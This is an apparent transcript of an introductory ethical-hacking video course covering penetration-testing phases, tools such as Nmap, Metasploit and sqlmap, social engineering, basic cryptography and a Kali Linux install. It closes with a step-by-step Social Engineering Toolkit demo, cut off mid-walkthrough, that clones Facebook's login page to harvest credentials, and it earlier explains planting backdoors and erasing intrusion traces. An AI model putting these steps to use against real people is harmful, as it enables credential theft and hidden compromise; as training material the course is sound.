assessment is finding out the exact security posture of the organization by identifying what security controls are in place, how they've been configured, and if there are any gaps in the configurations themselves. So an organization will hire an ethical hacker. They would give the ethical hacker the information about what information is or what security controls, what firewalls, what IDSS, IPSS, intrusion detection or intrusion prevention systems, antiviruses are already in place, and then they will ask the ethical hacker to figure out a way to bypass these mechanisms and see if they can still hack the organization. What is the need of an ethical hacker? The need of an ethical hacker is proactive security. The ethical hacker would identify all the existing flaws in an organization and try to resolve those flaws to help secure the organization from black hat hackers. So ethical hackers would prevent hackers from cracking into an organization's network by securing the organization, by improving on their security on a periodic basis. And they would also try to identify system vulnerabilities, network vulnerabilities, or application level vulnerabilities that would have been missed or have already been missed, and then try to figure out a way of plugging them or resolving them so that they cannot be misused by other hackers. They would also analyze and enhance an organization's security policies. Now, what are policies? Policies are basically documents that have been created by an organization of rules that all the employees need to follow to ensure that the security of an organization is maintained. For example, a password policy. A password policy would help users in an organization to adhere to the standards the organization has identified for a password complexity. For example, a password, when a user is creating them, should adhere to standards where they are using random words. They contain the alphabet A through Z, uppercase and lowercase, 0 through 9 as numerics, and special characters, and they are randomized so that the password becomes more stronger to prevent from brute force attacks. So what would an ethical hacker do at this point in time? They would try to test the strength of the passwords to see if brute force attacks or dictionary attacks are possible, and if any of these passwords can be cracked. They would ensure that all the employees are following the policies and all the passwords are as secured as the policies want them to be. If there are any gaps in the policies or the implementation of the policy, it is the ethical hacker's responsibility to identify those gaps and warn the organization about it. Similarly, they would also try to protect any personal information, any data that is owned by the organization that is critical for the functioning of the organization, and they will try to protect it from falling into the hacker's hands. Now, what are the skills that are required of an ethical hacker? These are the following skills. So first and foremost, they should have good knowledge with operating systems such as Windows, Linux, Unix, and Mac. Now, when we say knowledge about operating systems, it's not only about how to use those operating systems, but how to troubleshoot those operating systems, how these operating systems work, how these operating systems need to be configured, how can they be secured. For example, securing an operating system is not only installing a firewall and an antivirus, but you need to configure permissions on an operating system of what users are allowed to do and what users are not allowed to do. For example, limiting the installation of applications. How are we going to do that? We need to go into the system center, the security center of Windows, and we need to configure security parameters over there of what are acceptable softwares and what are not. Same with Linux and Mac softwares, operating systems. So we need to know how we can secure these operating systems. Similarly, all of these would have desktop versions and server versions of operating systems. As an ethical hacker, we need to know the desktop and server versions both, how to configure them and how to provide services within the organization on these servers so that they can be consumed in a secure manner by all the employees. At the same time, they should also be knowledgeable of programming languages or scripting languages such as PHP, Python, Ruby, HTML for programming, if you will, because web servers come into the picture. So again, they should not be great developers where they can create huge applications, but they should be able to develop scripts, understand those scripts, analyze those scripts, and figure out what the output should be of those scripts to achieve the hacking goals that they have set out for. An ethical hacker should have a very good understanding about networking. No matter whether you're in application security, you're in network security, or you're in host-based security, since a computer will always be connected to a network, either a local area network like a LAN or the internet, we should know how networking works. We should know the 7 layers of the OSI model. We should know which protocols work on those 7 layers. We should identify the TCP/IP model and how a OSI model can be mapped to the TCP/IP model. We should understand how TCP and UDP work, how each and every protocol is crafted, how they are supposed to behave for us to analyze and understand any network-based attacks. We should be very good in security measures. So we should know where those vulnerabilities would lie, what are the latest exploits available in the market, and we should be able to identify them. We should be able to know the techniques and the tools of how to deal with security, how to analyze security, and then how to implement security to enhance it as well.
Along with that, it is important that a security analyst or ethical hacker is aware of the local security laws and standards. Why is that? Because an organization cannot do any illegal activity. Whatever responses that they have, whatever security mechanisms, whatever security controls they will implement, they need to be adhering to the local law of the land. They should be legal in nature and should not cause undue harm to any of the employees or any of the third-party clients that they are dealing with. So the ethical hackers should be aware of what security laws are before they implement security controls, or even before they start testing for security controls. And all of these should be backed up by having a global certification or a globally valid certification related to networking, related to security, ethical hacking, the law of the land, anything and everything. Maybe even programming. It's good to have a certification in PHP, Perl, Python, Ruby, and so on and so forth. Why? Because most of the organizations, when they hire ethical hackers, look out for these certifications, especially globally valid certifications, so that they can be sure, or they can be assured that the person that they are hiring has the required skill set. So let's talk about a few of the tools that an ethical hacker would utilize in their testing scenarios. To be honest, there are hundreds of tools out there. What you see on the screen are just a few examples of them. Nessus is a vulnerability scanner. What is a vulnerability scanner? It is an automated tool that is designed to identify vulnerabilities within hosts, within operating systems, within networks. So they come with their ready-made databases of all the vulnerabilities that have already been identified, and they scan the network against that database to find out any possible flaws or any possible vulnerabilities that currently exist on the host or the operating system or on the network. Similarly, there would be application scanners like Acunetics or Arachne that would help you scan applications and identify flaws within those applications as well. Now, all of these are automated tools. The essence of ethical hacker is when these tools churn out the reports, the ethical hacker can understand these reports, analyze them, identify the flaws, and then craft their own exploits or use existing exploits in a particular manner so that they can get access, or they can bypass the access or security controls mechanisms that are already in place. How can they do that? With the tool called Metasploit. You see that big M there on the right hand side? That M logo is for a tool called Metasploit, which is a penetration testing tool. What is a penetration testing tool? It is that tool that will allow an ethical hacker to craft their exploits or choose their exploits for the vulnerabilities that have been identified by Nessus. Since we are interacting with computers, we will always be interacting using tools, right? So the first tool, Nessus, identifies the flaws and the possible list of vulnerabilities. We do a penetration test using Metasploit to validate those flaws and to verify that those flaws actually exist, and try to figure out the complexity of those flaws. And that's where Metasploit helps us do that. Wireshark would be used in the background while you are doing both the activities using Nessus or Metasploit to keep a track of what packets are being sent and received on the network, which will help us analyze those packets. So whenever I run a Nessus scanner, I would run a Wireshark in the background. It will capture the data packets, and I can go through those data packets and analyze that data packets to identify what Nessus is actually trying to do. Similarly, when I try to attack a machine using exploit on Metasploit, I will keep on Wireshark running in the background to capture the data packets that have been sent and the responses that I've received from the victim, so that I can also go through those packets and analyze the responses and analyze the attack, whether it was successful, to what extent was it successful, and basically will also give me a validation, a proof of the activity that has happened. Nmap is another automated tool that allows me to scan for open ports and protocols. So why would I use Nmap? Because ports and protocols become an entry point for a hacker to gain access to devices. For example, when we connect to a web server, we connect through a web browser, but we automatically connect to port 80 using HTTP and port 443 is using HTTPS. So if I'm connecting to a web server using HTTPS, it is safe to assume that port 443 on the web server is open to accept those connections. Similarly, there would be other services that may be left open on the web server because nobody thought about configuring it, or they misconfigured the web server and they left unwanted services running. So Nmap will allow me to scan those ports and services and allow me to understand what services are being offered on that server. So then I can start analyzing that server, identify those flaws within those services, and then try to attack them. If the application that I'm analyzing is connected to a database and I want to do a SQL injection attack, or if Nessus tells me that there is a SQL injection attack that may be possible on that particular application, I can use an automated tool called SQL Map or SQL Map that would allow me to automatically craft all the queries that are required for a SQL injection attack and help me do that attack at the same time. So here I do not have to manually create my own queries. The SQL Map tool would automatically create them for me. What I would do is I would use Nessus to identify that particular flaw. If Nessus reports that flaw, I would then go use the tool SQL Map, configure it to attack that particular web server, and when I fire off the tool, it will then automatically start directing queries, SQL injection queries, to the database to see if those databases are vulnerable, and if yes, what data can be retrieved from those databases. So all of these tools in a nutshell would help me hack networks, applications, operating systems, and host devices. And this is what an ethical hacker does. They use these kind of tool sets, they identify what attacks they need to do, they identify the right tool for that particular attack, and they write their exploits, they create those attacks, and then they start attacking, analyze the response, and then give a report to the management, providing them feedback about how the attack was created or crafted, what was the response to that attack, and whether the attack was successful or not. If successful, they would also give recommendations of what to do to prevent these attacks from happening in the future. So when we are doing these attacks, or when we want to launch these attacks, what is the process that we would follow? So there are 6 steps that we would do as an ethical hacker. If you are just a hacker, you probably wouldn't do the 6th step, which is a reporting step. So the first step that would be done is the reconnaissance phase, which is the information gathering phase, which is very important from an ethical hacker's perspective or a hacker's perspective. Because if I want to attack someone or something as a digital device, I need to know what I'm attacking. I need to know the IP address of the device, the MAC address of those devices. I need to know the operating system, the build or the version of that operating systems, applications on top, the versions of those applications, so I know what I'm attacking. For example, if I want to attack a server, I assume it's a Windows-based server and I use a particular tool to attack it, but it actually turns out to be a Linux-based server, my attacks are going to be unsuccessful. So I need to focus my attack based on what is there at the other end. So in my information gathering phase, I want to identify all of that information. Once I have that information done, I'm going to scan those servers using tools like Nmap that we just talked about, and we're going to try to see the open ports, open services, and protocols that are running on that server that can give me possible entry points within the network or within the device or within the operating system. At the same time, along with the scanning with Nmap, I would run a vulnerability scanner, the Nessus vulnerability scanner we talked about, or Acunetics for applications, and then I would try to identify vulnerabilities in those applications, operating systems, or networks. Once I have identified those vulnerabilities in the scanning phase, I would then move on to the gaining phase, where I would then craft my exploits or choose existing exploits and start attacking the victim. At this point in time, if my attack is successful, I will probably have gained access by either cracking passwords or escalating privileges or exploiting a vulnerability that I may have found during the scanning phase. Once I have gained my access, I want to maintain my access. Why? Because the vulnerability may not be there for long. Maybe somebody updated the operating system and hence the flaw was no longer existing, or somebody changed the password that I may have cracked, thus I no longer have access. So what do I do to maintain my access? I install Trojans or backdoor entries to those systems using which I can secretly, in a covert manner, get access to those devices at my own will, at my own time, as long as those devices are available over the network. So that's where I maintain my access. I have hacked them. Now I want to maintain my access, so I install a software which would give me a backdoor entry to that device no matter what. Once I have done this, I want to clear my tracks. So whatever activity that I've been doing, for example, installing a Trojan. A Trojan is also a software that would create directories and files once installed on the victim's machine. So I want to hide that. If I have accessed data stores, if I have modified data, I want to hide that activity, because if the victim comes to know that something has happened, they would start increasing their security parameters. They might start scanning their devices. They may take them offline. Thus, my hack would no longer be efficient. The reason I'm clearing my tracks is that the victim doesn't find out that they have been hacked or they have been compromised, or even if they do find out that they've been compromised, they cannot trace the compromise back to me. So I would be deleting references of any of the IP addresses or MAC addresses that I may have used to attack that particular device. And this is where I will be able to identify where those logs were created, where those traces are. Once I take off those traces, the victim would not be any wiser of whether they have been compromised or who compromised their system. And if I am successful at all of these stages, or to whatever extent the success that I've achieved in any of these stages, I would then create a report based on that, and I would report to the management about the activities that we have been able to do and whatever we have been able to achieve out of those activities. For example, we identified 10 different flaws. There were 20 different attacks that we wanted to do. What attack did we do? What was the outcome of that attack? What was the intended or the expected output of that attack? I'll create a report which would give a detailed analysis of all the steps that were taken, along with screenshots and evidences of what activity was conducted, what was the output, what was the expected output, and I would submit that report to the management, giving them an idea of what vulnerabilities and flaws exist in their environment or their devices that need to be mitigated so that the security can be enhanced. So these are the 6 steps that the ethical hacking process would take. Just going through this, the reconnaissance is where you're going to use hacking tools like Nmap, HPing to obtain information about targets. There are hundreds of tools out there depending on what information you want. Then in scanning, again, Nmap, Nexpose, these kind of tools to be utilized to identify open ports, protocols, and services. In gaining access, you're going to exploit a vulnerability by using the Metasploit tool that we talked about in the previous slides. In the maintaining access, you're going to install backdoors. You can use Metasploit at the same time. You can craft your own scripts to create a Trojan and install it on the victim's machine. Once you have achieved that, clearing tracks is where you're going to clear all evidences of your activity so that you do not get caught or the victim doesn't even realize that they have been hacked. And once you're done all of this, we are going to create reports that are going to be submitted to the management to help them understand the current security evaluation of their organization. So now let's see how we can hack using social engineering. Now, what is social engineering? Social engineering is the art of manipulating humans into revealing confidential information which they otherwise would not have revealed. So this is where your social skill and your people skills come into the picture. If you are able to communicate effectively to another person, they would probably give up more information that they intended to give out. Let's look at examples, right? If you see on the screen, phishing activity. What is phishing? We receive a lot of fake mails on a regular basis. We have always received those emails where we have won a lottery of a few $1 million, but we have never realized that we didn't purchase a lottery to win a lottery in the first place. We have always had those Nigerian frauds where a prince died in some South African country and you out of 7 billion people on the planet have been identified where they want to transfer a few $100 million through your account and they want to give you 50% of that money in return as thank you. So some very basic attacks where you go onto websites and there's a banner flashing at you saying congratulations, you're the 1 millionth visitor to this website, click here to claim your prize. All of these are social engineering attacks, phishing attacks, fake websites, fake communications being sent out to users to prey on their gullibility. Most of humans always have that dream of striking it rich, winning a huge lottery once and for all, and living their life lavishly ever after. But sadly, in the real world, that doesn't happen that often. And if you're receiving those mails, it is very important that you first research the validity of those communications before you even want to act upon them. So why are humans susceptible to social engineering? Because humans have emotion. Machines do not. Try pleading with a machine to give you access to an account that you have forgotten a password to. The machine wouldn't even know what you're doing. Try pleading with a human, sympathy or empathy, where you could try to create a social engineering attack where you can plead with them saying, if I do not get access to this account immediately, I might lose my job. And then that would put my family into problems. Somebody would feel empathy or sympathy towards you and help you reset that password and give you access to that account. It's how good the attack is and how convincing you are for the success of this attack to happen. So what is a familiarity exploit? Attackers interact with victims to gain information which will benefit the attackers to crack credentials. As passwords, if we want to reset our passwords, what do we have as a mechanism to resetting passwords? We have some security questions that we set up. Those questions are nothing but personal information that we would know. But through a social engineering attack, it would be easily be able to gather the information that you have set for your security questions. The security questions can be as simple as the first school that you attended. You probably have that listed on your LinkedIn profile, where a person can just go in there and see your academic qualifications and identify the school that you were in, right? Similarly, it might also be a question, what was your mother's maiden name? That's a very good attack, and that's if a person can interact with you, let's say they are trying to take a survey and they approach you for a feedback on a particular product that you have been utilizing, and they ask you these questions, you wouldn't think twice before giving those answers. As long as the request sounds legitimate to us, we are able to justify that request, we do answer those queries. So it's upon us to verify the authenticity of the request coming in before we answer it. Phishing, as discussed, would be fraudulent emails which appear to be coming from a trusted source. So email spoofing comes into mind, fake websites, and so on and so forth. Exploiting human curiosity. Curiosity killed the cat, right? So there's so many physical attacks where hackers just keep pen drives lying around in a parking lot. Now this is a generic attack. Whoever falls victim will fall victim. So if I just throw around a few USBs in the parking lot, obviously with Trojans implemented on them, some people who are curious or who are looking for a couple of freebies might take up those pen drives, plug them in their computers to see what data is on the pen drives. At the same time, once they plug in those pen drives on their computers, the virus or the Trojan would get infected and cause harm to their machine. Then exploiting human greed. We just talked about the Nigerian frauds and the lotteries, those kind of attacks, the fake money-making gimmicks. Now, basically, this is where you prey upon the person's greed kicking in, and they are clicking on those links in order to get that money that has been promised to them in that email. So one of the safest mechanisms to keep data private and to keep yourself secure is using encryption. Now, encryption can happen through cryptography. What is cryptography? Cryptography is the art of scrambling data using a particular algorithm so that the data becomes unreadable to the normal user. The only person with the key to unscramble that data would be able to unscramble it and make sense out of that data. So we're just making it unreadable or non-readable by using a particular key or a particular algorithm, and then we're going to send the key to the end user. The end user using this same key would then decrypt that data. If anybody compromises that data while it is being sent over the network, since it is encrypted, they would not be able to read it. So the encryption algorithm would be something like this. Now, if you see the computer word once made into unreadable format would look like EQORXVGT. For an end user, it wouldn't make any sense, but the person who has a key to unscramble that would be able to convert it back to computer and then understand the meaning of that word. So this is just a substitution cipher that is being shown on the screen. So what is the alphabet? The key is alphabet plus 3. So C plus 3 alphabets, that becomes E. O becomes Q. M becomes O. So the key that is utilized to scramble the data is the character that you are at. The third character from there would be the corresponding key. So the encrypted message is also known as a cipher. The decryption is just the other way around, where you know the key now and you can now figure out what that E corresponded to by going back 3 characters in the alphabet. Most of the times, a certified ethical hacker must decrypt a message without knowing the secret key. So let's say a ransomware has affected your organization or has affected a device, and you want to figure out or you want to decrypt that data. Now, as an ethical hacker, you wouldn't be for paying a ransom to the hacker, would you? So it is now your prerogative of how you're going to work around and how you're going to try to crack the encryption mechanism, how to crack the cipher to decrypt that message and see what's within it, right? Decryption without the use of a secret key, that is known as a cryptanalysis. Cryptanalysis is the reversing of an algorithm to figure out what the decryption was without using a key. So cryptanalysis can be done using various formats. The first one is a brute force attack, second is a dictionary attack, the third one is a rainbow table attack. A brute force attack is trying every combination, permutation and combination of the key to figure out what the key was. It is 100% successful, but may take a lot of time. A dictionary attack is where you have created a list of possible encryption mechanisms, a list of possible cracks, and then you try to figure out whether those cracks work or not. Rainbow tables are where you have an encrypted text in hand and you're trying to figure out the similarities between the text that you have and the encrypted data that you wanted to decrypt in the first place. So in the brute force attack, you're trying every possible combination, permutation of what the key would be. In dictionary attack, you have a word list that would tantamount to the key, and if you're trying to match all the words listed in the text file or the word list to see if any of those words are going to work to decrypt that data. Here in the rainbow table, the ciphertext is compared with another ciphertext. You find out similarities and then you try to work or reverse engineer your way accordingly. So let's have a quick demo on cryptography before we end this session. So to begin with the demo of cryptography, we are on a website called spammimic.com, which will help us scramble the message that we created into a completely format which would be unrelated to the topic at hand. So if I say I want to encode a message, turn a short message into spam. So what this does is, you want to send across a secret message, you type in the secret message, a short one, and it will convert that into a spam mail. You send it across, so whoever's reading that spam mail would never get an idea of the embedded message within it. So if I want to type in a message here, hi, this is a secret message, the password is ASD@1234, and I want to send this out to people or to one of my colleagues, but I want to send it out in a secret manner so that others are not aware of this. So when I press on encode, what the algorithm will do is it will convert this message into a spam mail. So my message, hi, this is a secret message, the password is @1234 or ASD@1234, gets converted into this. Now if you read it, dear e-commerce professional, this letter was specially selected to be sent to you. This doesn't make sense. There is nowhere or no reference to the actual message that I've already said. So if I copy this entire message and I send it, let's say via email, to the recipient. Now the thing is that the recipient needs to know that I've encoded it using Spam Mimic. The algorithm needs to remain the same. So once they know that it is Spam Mimic, what they can do is, now in this instance what I'm going to do is I'm going to open up a new browser and I'm going to go to the same website. And at this point in time, I'm going to click on decode. When I click on decode, I'm going to paste the message that I've just copied. There we are. And this message is now being copied into a different browser. And if I decode this, you will see that it will convert it back to the original message that there was. So the key is there at Spam Mimic, and it is embedded within the message. So whenever we paste the message in the decode factor, it knows what the key was and it can decrypt that message and give me the actual message that was embedded within it. There we are, the entire message. This is what we created in the Google Chrome browser, and in the Firefox browser we decoded. Similarly, if I want to protect these kind of messages, there is an aspenencrypt.com website where, let's say, we use text encryption and I want to encrypt the same message. This is a secret message. The password is ASD@1234, and then I give it a password to protect this message, let's say the word password, and I use the cipher to scramble this by using, let's say, AES, which is the strongest cipher right now, and I say encrypt. So this is what the encryption would look like, and basically if I don't have the password over here, if I decrypt it, you would see that the error has occurred. Now if I type in the password over here and then decrypt it, it will be able to convert that back into the unscrambled text, and it will give me what the original message was. This is a secret message. The password is ASD@1234. So if I want to keep my data secure from hackers, I want to scramble it in such a way that they would not be able to crack it, or it would be very difficult for them to crack it. And this is one of the first mechanisms that would be recommended by any ethical hacker to keep the data secure. Now let's talk about downloading and installing Kali Linux. Along with that, we'll also be looking at the basic commands that are required for Kali Linux. Alright, so I've opened my browser and we want to go to the Kali website. So we want to go to kali.org. You can directly type in kali.org and go to the website. I can just do a Google search and say Kali download, and it will give you the same website, but it will directly take you to the downloads pages. So either here or you can go to the home page. Cookies are being installed on your machine, so see which cookies you want to allow. I'm only going to use the necessary cookies to support this site, and you can see that this gives you the latest Kali Linux news and tutorials, gives you the latest release, what is in that release, and gives you a lot of documentation which will help you understand what tools have been developed and what functionality has been given in the latest version. If you want to download, you can directly go here and you can download Kali Linux. Now, Kali Linux is a 2.6 gigabyte download, so it's going to take time, the latest version being 2019.4. And we click over here. I'm using a download manager to manage all these huge downloads, and you can see it's pointed to the operating systems folder, and it is going to be a 2.57 GB download. So we click on download, and in the background, you can see this is going to be downloaded, and we're going to minimize this. And it will take a few minutes for that to download, but this is an ISO image, so we need to install it on a virtual machine. So what we need is we need to use a hypervisor which will allow us to create virtual machines. So we can either use VMware Workstation, which you can download from here. However, this is paid version, so you can see it is around $250 or something for this software, but it is a very good software to have. So if we click on download now, it is going to start the download. It's a 30-day trial period if you want to use it. After 30 days, you'll need to enter the key, which you'll get after purchasing the software. If you do not want to utilize this, the free version that you have, you can either download VMware Player, but there are some limitations for VMware Player that you might want to look at. You want to compare these products before you want to purchase them, right? Otherwise, you can download Oracle VirtualBox, which is a free hypervisor. It's not as robust as VMware Workstation, but it does the trick, right? So the free version 6.1 is free, and you can then create your own virtual machines over there and install operating systems on them. What I already have a VMware Workstation installed, so I'm just going to open that up, and that's my VMware Workstation. As you can see, I already have a lot of virtual machines created over here. What we are going to do is we are going to configure a virtual machine for the Kali Linux operating system that we are downloading, which should be somewhere here. Let's see, it's at 43%, so halfway there. Till then, let's create the virtual machine. So I click on File, create a new virtual machine. I'm going to customize the machine, so click on Next. This leave it default, we don't want to change that, and then we want to install the operating system later. We don't want to point it out right now, so I'll just click on I will install the operating system later. Click on Next. We want to install Linux. Now in the drop down you would not see Kali Linux over here. However, you can choose Ubuntu 64-bit. That's what I'm going to choose. There it is. Next. What is the name that we want? I want to give it Kali Linux without the typo, and I want to store it in one of the folders that I've created. By default it stores on the C drive, which is not a good place to store. You don't want to run out of space on your C drive. So I'm going to click on this PC, and this is my data, and in here I'll have a folder called VirtualBox or virtual machines. There it is, within which you can see the other softwares that I already created. I'm going to create a new folder and call it Kali 2019 L. L for is latest for me, because you can see I already have a Kali Linux. So I'm just going to identify this folder with the L at the end. Going to select it and click on OK. You can see the path being changed over here. Click on Next. It's going to ask you how many processors. Now depending on the processor that you have, you can see I've got an 8-core i7. So if I give it 16 cores or 16 processors, that's not going to work. I cannot go beyond what the physicality already is. So for this machine, one processor with 1 core is more than enough. If you're going to use a lot of tools at the same time, you might just want to give it 2 cores. So we're giving it 2 cores. It will ask us for RAM to be provided for this virtual machine. By default 2048 megabytes, that's 2 GB of RAM is more than enough. If you require more, we can change this later on. So click on Next. We want to use NAT for now. Leave this default. Next. Whatever is recommended, keep it the way it is. We do not want to change it. Next. Create a new virtual hard disk for this machine, and it is going to ask us the size. 20 GB is more than fine. Store it as a single file. We don't want to use multiple file options. Click on Next, and then click on Browse, where we want to store the VMDK file or the virtual hard disk file. And we go back again to the same folder that we had created, virtual machines, and we look at the Kali Linux, Kali 2019 L, and we want to store the VMDK file over there. Once we save it, we want to click on Next, and then we want to click on Finish. So this is the virtual machine that has been created right here, right? Now this is the basic configuration. Now where are we at with the operating system? And you can see the operating system has been downloaded, and it is stored in this particular folder. So we go to E drive. So we are looking for the operating system that we have downloaded. We downloaded it in the operating systems folder, and if we go in here, you can see the current one the Kali Linux 2019.4 ISO right here. So what we do, we go back to the Kali Linux machine that we have created, edit virtual machine settings, and we point this virtual machine using the CD DVD, and then we point the ISO, the one that we downloaded over here. So we go back to E drive, we go back to OS, and we click on Kali Linux 2019, click on open. So now when this boots up, it will boot up with this ISO, and then it will allow us to install the operating system. So click on OK. Then we click on power on this virtual machine. It will start powering on. It will boot to the ISO and it will start giving us the booting options. So I'm just going to enter the full screen mode over here for this to be better visible. And we don't want the live mode. What we want is we want to use the graphical install. And then we highlight that, we press enter, and you can see the setup starting up. We'll wait for the GUI to pop up. There it is. Which language do we want? For now we want English. Click on continue. Where are we located? Click on continue. And the configure your keyboard, we want the US keyboard, American English. Continue. It is going to detect the hardware. So as you can see on the screen, it's attempting auto configuration for most of these settings. The network with DHCP, it has identified the network cards, hardware like the processor that has been provided. Now it is asking for a host name. We're going to leave it at default. We're going to click on continue. Domain name, I'm not joining this into a domain as yet. This is going to be a standalone machine, so I can leave this blank. Click on continue. Now it is going to configure the network. It is asking for a password at this point in time, the root password. Type in any password that you want. Ensure that you remember the password. Now by default, the username for the account is the word root. We are just creating the password for the root account. And then we want to click on continue. Setting up the clock, looking at the hard disks. Now here it asks us, do we want to use the entire disk, the 20 GB virtual hard disk that we had provided, or do we want to give it a manual configuration or a guided one where we want encryption and a logical volume management coming into the picture. We're just going to use the first option, guided use entire disk. Don't worry, it's only going to use the virtual disk that we had created. Click on continue. It will give us that it's a 21.5 GB VMware virtual disk that we had. And click on continue. All files in one partition, that's what we want, recommended for new users, whatever it is. We don't want to change these folders. Continue. And this is what we have configured. Once we click on continue, it is going to say, are you sure you want to make these changes? Click on yes. Click on continue, and it will start installing Kali Linux on your device. Now this is going to take a few minutes for the installation to work. Alright, so that's the installation that's completed. Now it's asking us to configure a package manager. A network mirror can be used to supplement the software that is included on the installation media. This may also make newer versions of software available. Do you want to use a network mirror? We can click no for now and then click on continue. Now this is going to install the grub bootloader. This might take a few minutes as well. Install the grub loader to the master boot record. Yes. Click on continue. Click the hard disk that you have just utilized. This is the one. Click on continue. It will install the grub bootloader, running through the last phases of the installation. And now it says the installation is complete. We want to click on continue, finishing the installation, and then it will do a reboot. Alright, and you can see this is starting up. So we are going to you just wait out the boot, and now it started the booting sequence. Just going to maximize the screen. And you can see it's asking me for the password. This is the one that we created. Now that's not the password, that's the username, that's the root, and the password that we had created at that point in time. And then click on log in. And this is your screen. Now what we need to do here is we need to install VMware tools, which will help us manage the screen and help the virtual machine to be a little bit better integrated on the system. So that's not mounted yet, so we're just waiting for it to mount. There it is. And what we want to do here is open VMware Tools Upgrader. Alright, so what we want is we want to extract, or we want to use this OpenX archiver, and once we do that, we'll see the VMware install.pl. Double click on that. Alright, we've got the VMware tools here. What I've done is we have extract to, and I've extracted that on the desktop, right? So what we just did was click on the desktop over here, open, and this is what it will do. And click on extract. Now the error is happening because I've already extracted this. Open this up. We want to run this VMware install.pl. So what do? We open up the terminal window, which is the command line interface over here. And now this is where some of the commands come into the picture. So for example, pwd, it will show us the present working directory. ls, will show us the list of the folders that are there. So the folder that we have is on our desktop, so we'll just change directory to desktop, press enter, do an ls, that will show us the list, and you can see VMware Tools Distrib. That's the folder that we have right here. Right, so we want to go into that folder, cd VMware. At this point you can just click on tab and it will populate everything over there. Press enter, do an ls, and we want the vmware-install.pl to be executed. Alright, so we tried executing that command, we had an error over there. So what we need to do is we need to execute this command. So /vmware -install.pl, and it will start creating. Now it will ask you for your input installing VMware tools. In which directory do you want to install the binary files? By default it is going to use /usr/bin. If I just press enter, it is going to use the default. As you can see, the input over here. What directory do you want the init directories? I'm just going to press keep on pressing enter for the defaults to come in. This part does not exist. It is going to create it. Default yes, defaults everywhere, and then it tries to start initializing it to maximize the screen, and this is where it is installing. And you can see by just installing that, it automatically adjusted the screen, and now we got a full screen of Kali Linux right here. Right, and that is what VMware Tools does for us once we have installed the operating system. And now you can see the entire screen. On here you will see the tool sets that are given here. Now, why are we using Kali Linux in the first place? Because this comes in with a bundle of thousands of softwares that are ready to be utilized for ethical hacking, right? And they have been categorized over here for information gathering, vulnerability analysis, web application analysis, and so on and so forth. So you can see from forensics onwards, reporting tools, and as you scroll down, you can see your development tools, graphics coming in, internet, and the system configuration coming into the picture. These are your settings for your operating system. So these are basically your tools. We are right now on the favorites. If I click on information gathering, you will see that other tools for information gathering start appearing over here. For vulnerability analysis, we have got Sparta, Nmap, fuzzing tools, web application analysis, we have got Comics, Kipfish, SQL Map, database assessments, password attacks, and so on and so forth. So if you just go in the favorites, this was the terminal emulator that we utilized. This is the command line that we saw. We used the cd command, we used the pwd command, we did the ls command as well to give us the list of the directory that we are in. Similarly, there would be commands like cat. So let's go to cd downloads. Let's see what's there. You can see this case sensitive. So if I type in a capital D and then do a tab ls, there's nothing over here on downloads. So cd ... will take us back one directory. Now you can see we are back from downloads to root. If I want to go to desktop, this is how I go to desktop. Do a ls, you can see the VMware tools folder over there, cd VMware tools, and we go into that folder ls, where it will give us the list of all those files. Now you can see install is a file that we had edited back then. So if I do a cat install, you will see the cat basically is the command that will help us look at the contents of the file, all right, without opening up the file or without editing the file. So you can see just if I scroll up, this is where we gave the cat command. It then printed the contents of the file over here, and then it exited and gave me back to the command line right here. Right, now if I want to copy this, cp root desktop VMware install, and if you want to copy it to root downloads and press enter. Now what we are going to do is we are going to see if this file, the install file that we just edited over here, has been copied to the downloads folder. So we do we are currently in the VMware on the desktop VMware Tools Distrib folder. We do a cd ... that takes us down one directory. So we are still in the desktop. Do a cd ... Now you can see we are back in the root, and now we are going to do a cd downloads, do an ls, and you can see the copied file right here. So if I do a cat install, you can see the same content of that file coming in. So these are some of the commands that we would need to learn as we go ahead. The remove command is, let's say we've got install, we do a man rm. Man is the manual page command that gives us the pages with the description of how that particular command is to be utilized. So rm is remove files or directories. Synopsis, the description, the options, -f for force, -i for prompt, capital I prompt once before removing more than 3 files, and so on and so forth. If you want to exit this, you can press Q to exit, and you come back to this page. So if I say rm install, ls, you will see that the install file has now been deleted. So in Windows we use the del command. In Linux it is the rm command. So this is what we wanted to look at, the demo for Kali Linux, how to download it, how to install it, and some of the basic commands that we can utilize. Alright, let's begin with the phishing tutorial. We have the Kali Linux operating system booted up over here. What we are going to do is we are going to open up a tool called SET, Social Engineering Toolkit, which you would find in this option. And that's the tool that we want. It's a command line tool, a menu driven tool. We are going to host a fake Facebook page, and we can see how we can harvest credentials by this kind of an attack. So these are some disclaimers you might want to go through there. Do you want to agree to the terms of service? Yes. Press enter, and that's your social engineering toolkit. And we are talking about a phishing attack which comes under the social engineering attack. So like I said, it's a menu driven tool, so we just have to look at these options and then just type in the number of the option that we want. So we want to do a social engineering attack, so I type in 1, press enter. In that it is asking me whether I want a spear phishing attack, a website attack vector. We are going to choose a second option, so I type in 2, press enter, and then it asks me what I want to do. I want to take the third option here, credential harvester attack methodology, and we want to do the third attack. Now it is asking whether we want to use the in-house website templates that it already has, or do we want to clone a site, or do we have a customized site that we have prepared that we want to migrate into this tool. We are going to do the site cloning option, so we are going to type in 2, press enter, and then it is going to ask me the IP address where it wants to capture and store the credentials. By default, this is the IP address that I'm using, so if I leave it blank, it will take my default IP address. So I'm just going to press enter, and now it is asking me the URL to clone. So I type in https www.facebook.com. What it is going to do, it is going to connect online, and it is now it has cloned the website, Facebook login.php. The best way to use this attack is that if the username and password form are in the same field or the same page. Regardless, this captures all posts on a website. So you may need to copy www into HTML depending on where your directory structure is. Press return if you understand what we are saying here. So press enter. The social engineering toolkit credential harvest attack is running on port 80. Information will be displayed to you as it arrives. So the site was 71.134, right? The default IP address, and this is where the website is being hosted. Let's check that out. So let me open up a browser on my host machine, and let me point it to the Kali Linux machine that we have just created, 192.168.71.134, and you should see a login to Facebook coming up right here. Looks genuine. It is genuine because we just went online and downloaded this. Let's just have a recap. Let's have an explanation of what we are trying to do. I am trying to host fake Facebook page on my server which has an embedded script in it which is going to do credential harvesting. So the attack here is, let's say if I'm now hosted this, I can craft a fake email, send it across to a victim saying your Facebook account has seen some unforeseen activity, create a hyperlink using HTML coding. Within that, click here to access your account and verify that the account is secured. And when they click on that link, they will be redirected to my fake page, which is here. You can see the IP address is my virtual machine's IP address, but I'm seeing a Facebook login page, and I'm going to type in someone@somewhere.com, and the password I'm just going to type in the regular ones that I use. And if you see it, when we typed in the username and password, the page just refreshed and gave us the login page again. But now if you look at the URL, I'm actually on Facebook's login page, which is exactly the same that I was hosting. So a layman wouldn't probably figure out they've been hacked by now. They just would figure out, okay, they probably typed in the incorrect password and the page refresh or something like that, and they're just going to log in and they're actually going to access the Facebook page. Thus, they might not 